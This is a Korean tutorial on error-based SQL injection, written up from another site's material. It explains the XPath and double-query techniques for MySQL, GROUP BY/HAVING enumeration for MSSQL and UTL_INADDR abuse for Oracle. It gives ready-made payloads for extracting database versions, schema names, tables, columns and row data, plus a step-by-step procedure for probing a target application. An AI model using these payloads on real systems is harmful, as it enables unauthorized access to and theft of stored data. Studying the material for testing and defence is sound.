Error 기반 SQL 인젝션

💡해당 내용은 pentestqym의 내용을 다시 한 번 정리한 내용이며,
   모든 저작권은 해당 사이트에게 있습니다.

오류기반 SQLi에 대하여 배워봅시다.

---

Error based SQLi

 데이터베이스 오류 메시지를 활용하여 데이터베이스에 대한 정보를 획득하는 SQL Injection 기법

 잘못된 SQL 문법이나 자료형 불일치 등으로 인해 데이터베이스가 발생시키는 오류 메시지를 이용하여 공격자는 데이터베이스의 구조와 정보를 파악할 수 있습니다. 이를 통해 개인 정보와 같은 민감한 데이터를 탈취할 수 있습니다. 이러한 공격은 App에서 DB 오류를 표시하는 경우에 주로 사용됩니다.

---

Error-based SQLi 원리

 DB로 전달되는 SQL 쿼리의 문법적 오류를 활용하는 기법으로, DB가 오류 메시지를 반환하거나 웹 애플리케이션에서 오류 정보를 노출하는 경우에 이용됩니다. 악의적인 사용자는 이 오류 메시지를 분석하여 DB 정보를 파악하고 공격에 활용할 수 있습니다. 이 공격 기법은 DB에 대한 정보 획득을 목적으로 하며, DB 종류에 따라 다양한 문법과 SQL 구문, 함수 등을 활용할 수 있습니다.

 

 즉, 오류 기반 SQL Injection은 DB로 전달되는 SQL 쿼리의 문법적 오류를 이용하여 데이터베이스 정보를 획득하는 공격 기법입니다.

---

Error-based SQLi 공격 기법

Mysql(MariaDB도 해당)

활용할 수 있는 공격기법으로 XPath와 Double Query가 있음

---

XPath

 extractvalue() 함수^[각주:1]를 활용한 기법으로 MySQL 기준 5.1 버전 이상에서만 가능합니다.

Syntax

extractvalue(xml_frag, xpath_expr)

 위와 같이 extractvalue()는 XML(xml_frag 인수)과 XPath 표현식(xpath_expr 인수), 두 개의 인수가 필요하고, 두 개의 인수를 통해 XML에서 XPath 표현식에 일치하는 데이터를 추출하여 반환해줍니다. 이 함수는 xpath_expr이라는 두 번째 인수에 유효하지 않은 XPath 표현식이 사용된다면 다음과 같은 오류가 발생합니다.

ERROR 1105 (HY000): XPATH syntax error: 'xpath_expr 인수의 값'

 

 신기한 점은 xpath_expr 인수로 임의의 SQL 쿼리를 지정했을 때 이 쿼리의 실행 결과가 오류 메시지에 포함된다는 것입니다. 우리는 이 점을 이용해 오류기반 SQLi를 수행할 수 있습니다. 두 번째 인수가 항상 유효하지 않은 XPath 표현식이 되도록 하기 위해 concat() 함수^[각주:2]를 이용해 콜론(:)을 앞에 추가합니다. 0x3a는 콜론의 16진수 표기법입니다. 첫 번째 인수는 임의의 값을 지정하기 위해 rand() 함수를 사용합니다. 

 

 그리고 마지막으로 후속 쿼리를 무효화하기 위해 가장 끝에 주석 문자(--)와 공백 문자(스페이스)를 추가합니다. 주석 문자 뒤에 공백 문자를 추가하는 것을 잊지마세요. 그러면 최종적으로는 아래와 같은 형태가 되겠군요. 

AND extractvalue(rand(), concat(0x3a, Excutable-SQL-Query))--

 

 이제 위의 공격 쿼리를 원래의 SQL 쿼리에 결합하고 "Excutable-SQL-Query" 부분만 아래의 내용을 참고해 추출하고자 하는 정보에 맞는 것으로 변경하면 됩니다

---

Error-based SQLi Attack Example

Example SQLi Attack

• 데이터베이스 버전 추출

AND extractvalue(rand(),concat(0x3a,version()))--

 

• 데이터베이스명 추출

AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a,schema_name) 
    FROM information_schema.schemata LIMIT 0,1)))--

 

• 데이터베이스명 추출 (웹 애플리케이션과 통신 중인 데이터베이스) 

AND extractvalue(rand(),concat(0x3a,database()))--

 

• 테이블명 추출 

AND extractvalue(rand(),concat(0x3a (SELECT concat(0x3a,table_name) 
	FROM information_schema.TABLES 
	WHERE table_schema='데이터베이스명' LIMIT 0,1)))--

 

• 컬럼명 추출

AND extractvalue(rand(),concat(0x3a, (SELECT concat(0x3a,column_name) 
	FROM information_schema.COLUMNS 
	WHERE TABLE_SCHEMA='데이터베이스명' AND TABLE_NAME='테이블명' LIMIT 0,1)))--

 

• 데이터 추출

AND extractvalue(rand(),concat(0x3a,(SELECT concat(컬럼1,0x3a,컬럼2) 
	FROM 데이터베이스명.테이블명 LIMIT 0,1)))--

 

 위의 extractvalue() 함수의 오류 메시지는 단일 행(한 줄)으로 반환되므로 LIMIT을 사용하여 한 번에 하나의 행만 출력될 수 있도록 하였습니다. 계속해서 다음 행의 데이터를 추출하기 위해서는 아래와 같이 반복하여 실행하면 됩니다.

...LIMIT 0, 1)))--      (SQL 쿼리에서 반환된 레코드셋의 첫번째 행 반환)
...LIMIT 1, 1)))--      (SQL 쿼리에서 반환된 레코드셋의 두번째 행 반환) 
...LIMIT 2, 1)))--      (SQL 쿼리에서 반환된 레코드셋의 세번째 행 반환)
...LIMIT 3, 1)))--      (SQL 쿼리에서 반환된 레코드셋의 네번째 행 반환)
... 생략 ...

위의 방식과 유사한 기법으로 updatexml() 함수를 이용할 수도 있습니다. 기본형은 아래와 같으며 추출하고자 하는 데이터에 따라 "실행할-SQL-쿼리" 부분만 위의 방식대로 변경해주면 됩니다.

AND updatexml(null, 실행할-SQL-쿼리, null)-- 

 

---

Double Query

 GROUP BY를 통한 그룹 집계의 기준 컬럼에 rand() 함수가 사용된 경우 발생하는 Duplicate entry 오류^[각주:3]를 활용한 공격 기법입니다. 이 오류는 MySQL에서 발생하는 버그로 간주되며 그룹 기준 컬럼이 중복될 때 발생하는 오류입니다. 특이하게도 행이 3개 이상 존재하는 테이블에서 FLOOR(rand(0)*2)를 기준 컬럼으로 하는 경우에는 rand() 함수가 그룹 집계의 기준으로 사용하기에는 가변적이고 안정적이지 않아서인지 오류를 뱉어냅니다. 이 기법을 이용하여 SQL Injection 공격을 수행할 수 있습니다.

SELECT FLOOR(rand(0)*2) 
FROM some-table;

 이 쿼리를 행의 수가 충분히 많은 임의의 테이블에서 실행한다면 아래와 같이 테이블 행의 수만큼 0 또는 1의 값이 반환됩니다.

 

floor(rand(0)*2)
================
0 
1
1    <--- Duplicate entry 오류 유발
0
1
1
0
0
1
1
1
0
1
...

 이제 아래와 같이 FLOOR(rand(0)*2)를 그룹 집계의 기준 컬럼으로 설정하고 그룹별 행의 수를 집계하기 위한 count(*) 집계 함수를 사용하여 쿼리를 실행하면 MySQL의 버그로 인해 위의 세번째 행이 두번째 행과 값이 중복되므로 Duplicate entry 오류를 발생시키게 됩니다. 

SELECT FLOOR(rand(0)*2), COUNT(*) 
FROM some-table
GROUP BY FLOOR(rand(0)*2) ;

 

보시다시피 오류은 다음과 같습니다.

SQL Error [1062] [23000]: (conn:113718) Duplicate entry '1' for key 'group_key'

 

 이 오류를 이용할 것입니다. 위의 설명대로, `concat()` 함수를 사용하여 "실행할-SQL-쿼리"와 `FLOOR(rand(0)*2)`를 결합하고, 이를 `x`라는 별칭으로 적용하면 쿼리는 다음과 같이 구성됩니다.

SELECT concat("실행할-SQL-쿼리", FLOOR(rand(0)*2)) AS x FROM 테이블명;

  위의 쿼리는 "실행할-SQL-쿼리"와 무작위로 생성된 0 또는 1의 값을 결합하여 `x`라는 별칭으로 출력하는 것입니다. 이를 통해 쿼리 실행 시 그룹 기준 컬럼의 Duplicate entry 오류를 유발할 수 있으며, 이 오류를 활용한 결과값을 얻을 수 있습니다. 이제 오류를 평가하고 결과를 명확히 도출하기 위해 서브쿼리를 사용할 것입니다.

SELECT 1
FROM (
	SELECT concat(실행할-SQL-쿼리, FLOOR(rand(0)*2))x,COUNT(*) 
	FROM some-table 
	GROUP BY x
     )a
)

 위에서 사용된 some-table은 3행 이상을 가진 시스템 테이블인 information_schema.TABLES로 변경하고, 역시 제일 마지막에는 주석 문자(--)와 공백 문자(스페이스)를 추가합니다. 그리고 원래의 SQL 쿼리에 주입시키기 위해 앞부분에 AND 연산사를 사용하면 최종적으로는 다음의 형태가 됩니다. 

AND (SELECT 1 FROM(SELECT COUNT(*), concat(실행할-SQL-쿼리, FLOOR(rand(0)*2))x 
	FROM information_schema.TABLES GROUP BY x)a)--

 이제 XPath 기법과 마찬가지로 아래 내용을 참고하여 "실행할-SQL-쿼리" 부분만 변경하면 원하는 정보를 추출할 수 있습니다. 마찬가지로 "실행할-SQL-쿼리" 부분의 LIMIT의 첫번째 값을 1씩 순차적으로 증가시키며 다음 행의 자료를 추출하면 됩니다. 

---

Double Query SQLi Sample

 

• 데이터베이스 버전 추출

AND (SELECT 1 FROM (SELECT COUNT(*), concat(version(), FLOOR(rand(0)*2))x 
	FROM information_schema.TABLES GROUP BY x) a)--

• 데이터베이스명 추출

AND (SELECT 1 FROM (SELECT COUNT(*),concat(
		(SELECT schema_name FROM information_schema.schemata LIMIT 0,1), FLOOR(rand(0)*2))a 
	FROM information_schema.schemata GROUP BY a LIMIT 0,1) b)--

• 데이터베이스명 추출 (App과 통신 중인 DB) 

AND (SELECT 1 FROM (SELECT COUNT(*),concat(database(),FLOOR(rand(0)*2))x 
	FROM information_schema.TABLES GROUP BY x) a)--

 

• 테이블명 추출

AND (SELECT 1 FROM (SELECT COUNT(*),concat(
		(SELECT TABLE_NAME FROM information_schema.TABLES 
		WHERE table_schema='데이터베이스명' LIMIT 0,1), FLOOR(rand(0)*2))a 
	FROM information_schema.TABLES GROUP BY a LIMIT 0,1) b)--

 

• 컬럼명 추출

AND (SELECT 1 FROM (SELECT COUNT(*),concat(
		(SELECT column_name FROM information_schema.COLUMNS 
		WHERE TABLE_SCHEMA='DB명' AND TABLE_NAME='테이블명' LIMIT 0,1), FLOOR(rand(0)*2))a 
    FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1) b)--

 

• 데이터 추출

AND(SELECT 1 FROM(SELECT COUNT(*),concat(
		(SELECT CONCAT_WS(0x3a,컬럼1,컬럼2,..., 컬럼N) 
		FROM DB명.테이블명 LIMIT 0,1),FLOOR(rand(0)*2))x 
    FROM information_schema.TABLES GROUP BY x) a)--

---

MSsql

Group by와 Having을 활용한 공격기법

 먼저 Group by와 Having에 대하여 알아봅시다.

Group by와 Having의 의미

Group by
: 대개 각 그룹에서 하나 이상의 집계를 수행하기 위해 쿼리 결과를 행 그룹으로 분할하는 SELECT 문의 절
- SELECT 문은 그룹마다 하나의 행을 반환

Having
: 그룹 또는 집계에 대한 검색 조건을 지정
- HAVING은 SELECT 문하고만 사용
- HAVING은 일반적으로 GROUP BY 절에 사용
- 사용하지 않을 경우 암시적 단일 집계 그룹 존재

 즉, GROUP BY를 통해 기준이 되는 컬럼을 그룹으로 묶어 그룹 별 집계를 수행하고 이 때 어떤 특정한 조건을 주기 위해 HAVING을 사용할 수 있습니다. 그런데 GROUP BY와 HAVING을 사용할 경우 아래와 같이 지켜야 할 규칙이 있습니다.

규칙

1. SELECT 절에 사용된 집계 함수 제외한 일반 컬럼은 GROUP BY 절에 기준 컬럼으로 포함됨
2. HAVING은 반드시 GROUP BY와 함께 사용되야함 (SELECT 절에 집계 함수만 있는 경우 제외)

 다음은 해당 조건들의 예시 쿼리로써 설명드리겠습니다.

[1] SELECT staff_no, name, SUM(salary_amt)
[2] FROM salary
[3] WHERE department = '22'
[4] GROUP BY staff_no, name
[5] HAVING SUM(salary_amt) >= 10000;

 월급 테이블에서(2번 라인) 부서코드가 22인 부서에 속한(3번 라인) 직원의 사번과 이름을 기준으로(4번 라인)  월급 합계를 구하는데 월급 합계가 $10,000 이상인(5번 라인) 직원의 사번, 이름과 월급 합계를 추출(1번 라인)하는 쿼리입니다.

 

 보시는 바와 같이 SELECT절에 사용된 일반 컬럼인 staff_no와 name 컬럼은 GROUP BY절에 포함되어 그룹별 집계를 위한 기준을 잡아주고 있으며, HAVING절은 GROUP BY와 함께 사용되어 조건을 지정해주고 있으므로 규칙에 위배되지 않은 쿼리입니다. 

 

아래는 해당 규칙을 위배한 사항으로 같이 살펴봅시다.

• 규정 위반 예시 1

[1] SELECT staff_no, name, SUM(salary_amt)
[2] FROM salary
[3] WHERE department = '22'
[4] GROUP BY staff_no    <--- 규칙1 위배 (SELECT절에 사용된 name 컬럼 누락됨.)
[5] HAVING SUM(salary_amt) >= 10000; 

실행 결과
-------
Microsoft OLE DB Provider for SQL Server (0x80040E14)
'salary.name'열이 집계 함수에 없고 GROUP BY 절이 없으므로 SELECT 목록에서 사용할 수 없습니다.

[1] SELECT staff_no, name, SUM(salary_amt)
[2] FROM salary
[3] WHERE department = '22'    
[4] HAVING SUM(salary_amt) >= 10000;  <--- 규칙2 위배 (GROUP BY 없이 사용됨.)

실행 결과
-------
Microsoft OLE DB Provider for SQL Server (0x80040E14)
'salary.staff_no'열이 집계 함수에 없고 GROUP BY 절이 없으므로 SELECT 목록에서 사용할 수 없습니다.

 위 내용을 살펴보면 무슨 부분이 없는지 명시하며 알려주는 내용을 확인할 수 있습니다. 즉 해당 테이블명과 문제가 되는 컬럼명(salary.name, salary.staff_no)을 확인하여 정보를 획득할 수 있습니다.

 

 이를 통해 SQLi를 진행하며, 취약한 컬럼이 문자형일 경우 아래와 같이 테이블명과 컬럼에 대한 정보를 얻을 수 있습니다.

• 테이블명과 첫번째 컬럼명 추출

1' HAVING 1=1--

• 두번째 컬럼명 추출

1' GROUP BY 테이블명.첫번째-컬럼 HAVING 1=1--

• 세번째 컬럼명 추출

1' GROUP BY 테이블명.첫번째-컬럼,테이블명.두번째-컬럼 HAVING 1=1--

....

 

위 과정을 오류가 발생하지 않는 시점까지 진행합니다. 그 시점까지 간다면 모든 컬럼을 알아냈다는 뜻이니까요.

 

 추가적으로 컬럼의 자료형까지 알고 싶다면 SUM()이라는 집계 함수를 이용하면 됩니다. 해당 함수는 지정된 컬럼은 자료형이 숫자형 X 경우 해당 컬럼의 자료형을 표시하며 오류를 띄웁니다.

1' UNION SELECT SUM(컬럼) FROM 테이블명--

이를 통해 알게된 정보로 UNION 기반 SQLi^[각주:4]를 진행하여 데이터를 추출할 수도 있습니다.

---

Oracle DB

UTL_INADDR Pack와 하위 프로그램인
GET_HOST_NAME or GET_HOST_ADDRESS의 문법적 오류 활용 

 

UTL_INADDR 패키지의 역할은 Oracle 공식 문서에서 다음과 같이 정의되어 있습니다.

 Oracle DB의 주소 관련 작업을 위한 패키지입니다. 주소 유효성 검사, 주소 형식 변환, 주소 구성 요소 추출 등의 기능을 제공하지요

 핵심은 인터넷 주소 지정을 지원하는 PL/SQL 프로시저를 제공합니다. 로컬 및 원격 호스트의 호스트 이름과 IP 주소를 조회하는 API를 제공

🤔 여기서 PL/SQL이란?

 Oracle DB에서 실행되는 저장 프로그램으로, 이름을 가지고 있으며 SQL 문과 제어 구문을 포함하는 블록입니다. 프로시저는 필요할 때 호출되어 실행되며, DB의 기능을 확장하고 비즈니스 로직을 구현에 사용됨

 

 이 UTL_INADDR 패키지와 함께 사용할 수 있는 하위 프로그램으로 GET_HOST_NAME과 GET_HOST_ADDRESS가 있습니다. 사용법은 아래와 같습니다.

UTL_INADDR.GET_HOST_NAME       (호스트 이름 조회)
UTL_INADDR.GET_HOST_ADDRESS    (호스트 IP주소 조회)

 위 두 하위 프로그램은 인수로 유효 X 값을 받을 경우 오류를 반환하고, 유효하지 않는 지정 인수 값(호스트 이름 or IP주소)가 표시됩니다.

 

 이를 활용하면 아래와 같은 기본 공격 구문을 만들 수 있습니다. 단, GET_HOST_NAME 대신 GET_HOST_ADDRESS를 사용할 수도 있습니다.

1' AND SELECT UTL_INADDR.GET_HOST_NAME(실행할-SQL-쿼리) FROM dual--

 

다음은 위의 기본 형식을 활용하여 정보를 얻는 예시입니다.

---

Oracle SQLi Sample

 

• 데이터베이스 버전 추출

1' AND SELECT UTL_INADDR.GET_HOST_NAME(
	(SELECT banner FROM v$version WHERE rownum=1)
   ) FROM dual--

• 테이블명 추출

1' AND SELECT UTL_INADDR.GET_HOST_NAME(
		(SELECT table_name 
		FROM (SELECT rownum rowidx, table_name FROM tabs) WHERE rowidx=1)) 
	FROM dual--

• 컬럼명 추출

1' AND SELECT UTL_INADDR.GET_HOST_NAME(
		(SELECT column_name FROM 
			(SELECT rownum rowidx, column_name 
			FROM cols WHERE table_name = '테이블명') WHERE rowidx=1)
		) 
	FROM dual--

• 데이터 추출

1' AND SELECT UTL_INADDR.GET_HOST_NAME(
		(SELECT 컬럼1 || ',' || 컬럼2 || ',' ... ',' || 컬럼N 
			FROM (SELECT rownum rowidx, 컬럼1, 컬럼2, ..., 컬럼N FROM 테이블명) 
			WHERE rowidx=1)
		) 
	FROM dual--

rownum의 값을 증감하여 해당 결과를 도출할 수 있습니다.

이 이외에도 아래 링크를 참조하여 더 배우시길 바랍니다(추후에 또 정리할 거 같네요)

SQL Injection

---

Error-based SQLi test method

 여기선 MySQL 5.1 이상의 DB와 연동된 App에서 오류 기반 SQLi 취약점을 테스트하기 위한 일반적인 프로세스를 다룹니다. 말씀드렸다시피 DB(와 버전 등)에 따라 테스트 기법은 다양하므로 이 섹션에서 사용된 기법 외에도 다른 기법을 활용하실 수 있습니다.

---

Step 1. DB와 통신하는 진입점(Endpoint) 식별

 대상 App을 탐색하여 DB와의 통신과 관련된 모든 진입점과 매개변수를 수집합니다. 다양한 사용자 권한과 역할이 있는 경우, 각 권한과 역할에 대한 모든 조합별로 사용자 계정을 생성하여 App을 테스트합니다. 공격 벡터는 GET 매개변수, POST Body 매개변수, Cookie 등의 표준 및 커스텀 요청 헤더를 활용할 수 있습니다.

 

Step 2. 잠재적 취약 여부 검증

 수집한 진입점과 매개변수가 SQLi에 잠재적으로 취약한지 검사합니다. 여기서 잠재적 취약 여부 검증은 사용자의 입력값이 SQL 쿼리로 해석될 수 있는지 여부로 판단됩니다. 의심되는 매개변수의 값이 연결되는 DB 컬럼의 자료형에 따라 문자열 타입인지, 숫자 타입인지에 따라 다음과 같은 방법으로 검증합니다.

---

IF.. 문자열 타입인 경우

 매개변수의 값이 홀따옴표(')를 입력 후 제출해보고 HTTP 통신의 결과를 확인해봅시다. 예시로..

idx=1234'

위와 같은 요청에 DB 구문 오류가 난다면 SQLi가 가능할 수 있습니다.

 

 또 다른 검증 방법으로는 문자열 연결 연산자의 기능을 확인합니다. 두 개의 파트로 나뉘어진 문자열을 문자열 연결 연산자를 사용하여 요청하고, 원래의 매개변수 값으로 요청했을 때와 동일한 응답이 반환되는지 확인합니다. 예를 들어, %2B는 더하기(+) 기호의 URL 인코딩된 문자입니다. 이 방법을 통해 SQLi에 취약할 수 있는지 확인할 수 있습니다.

idx=12' '34      (MySQL 또는 MariaDB)
idx=12'%2B'34    (MSSQL)
idx=12'||'34     (Oracle)

 "AND 1=1", "AND 1=2"와 같은 논리 조건을 주입하여 SQLi 취약점을 테스트할 수 있습니다. 등호(=) 기호는 URL 구조에서 매개변수와 값을 구분하는 역할을 하므로 논리 조건에서는 URL 인코딩 값인 %3D를 사용해야 합니다. 이를 통해 취약점 여부를 확인할 수 있습니다.

idx=1234%27+AND+1%3D1--+     (참이 되는 조건 주입)  
idx=1234%27+AND+1%3D2--+     (거짓이 되는 조건 주입)  

 첫번째 요청은 원래 요청과 같은 결과이며, 두번째 요청에는 다른 응답을 한다면 SQLi가 될 수 있습니다.(있는 그대로 SQL 쿼리로 응답 받는다는 의미일 수 있기에)

 

IF.. 숫자 타입인 경우

 홑따옴표(')를 이용하여 숫자 타입을 처리하는 App의 경우에는 위의 홑따옴표를 이용한 방법이 가능하기도 하나 자료형을 엄격히 준수하여 개발된 App은 그렇지 않은 경우가 다반입니다. 이런 경우 아래와 같은 방법으로 숫자 타입의 매개변수가 DB와 연동되는지 확인할 수 있습니다. 다음과 같은 요청이 있다고 가정합시다.

idx=4

  idx 매개변수에 산술 연산자를 사용한 계산식을 적용합니다. 계산식의 결과가 모두 4이며, 원래의 요청(idx=4)과 응답이 동일하다면 SQLi에 취약할 수 있습니다. 더하기(+) 기호는 %2B를 사용합니다. 이를 통해 취약점 여부를 확인할 수 있습니다.

idx=5-1
idx=3+1
idx=53-ASCII(1)     ---> ASCII(1)의 값은 49로 계산 결과는 4임

마찬가지로 논리 조건을 주입하여 응답을 확인해봅시다.

idx=4+AND+1%3D1--+     (참이 되는 조건 주입)  
idx=4+AND+1%3D2--+     (거짓이 되는 조건 주입)    

 

Step 3. 오류 기반 공격 기법이 가능한지 파악

위에서 소개된 MySQL XPath 기법을 이용해 오류가 유발되는지 확인합니다. 지정된 sqli test는 임의로 지정한 문자열입니다.

idx=1234'+AND+extractvalue(rand(),concat(0x3a,'sqlitest'))--+

숫자 타입인 경우는 아래와 같이 idx=1234 바로 뒤의 홑따옴표(')가 없어야 합니다.

idx=1234+AND+extractvalue(rand(),concat(0x3a,'sqlitest'))--+

HTTP 응답 메시지 안에 다음과 같은 오류메시지가 표시된다면 오류 기반 SQL Injection에 취약하다고 볼 수 있습니다.

XPATH syntax error: ':sqlitest'

 

Step 4. 데이터 추출

 오류 기반 SQLi 기법 섹션의 XPath 부분을 참고하여 DB 버전, 테이블명, 컬럼명 등의 원하는 데이터를 획득함

---

실습 문제 풀이

준비 중...

---

참고 자료

 

참고 이미지

 

 

1. MySQL에서 XML 데이터에서 값을 추출하는데 사용되는 함수이며, XPath 표현식을 적용하여 값을 반환합니다. 그러나 적절한 보안 조치 없이 사용될 경우 SQL Injection 취약점을 악용할 수 있으므로 주의! [본문으로]
2. 문자열 혹은 배열을 하나로 합쳐 새로운 배열 또는 문자열을 반환함 [본문으로]
3. DB에서 고유 제약 조건을 위배하여 중복된 값을 삽입하려고 할 때 발생하는 오류입니다. 고유 제약 조건은 테이블의 특정 컬럼에 고유한 값을 가지도록 설정하는 것으로, 중복된 값을 삽입하려고 할 경우 데이터베이스는 Duplicate entry 오류를 반환합니다. 이 오류는 데이터베이스의 데이터 무결성을 유지하기 위해 발생하며, 중복된 데이터를 방지하는 역할을 합니다. [본문으로]
4. 준비 중.. [본문으로]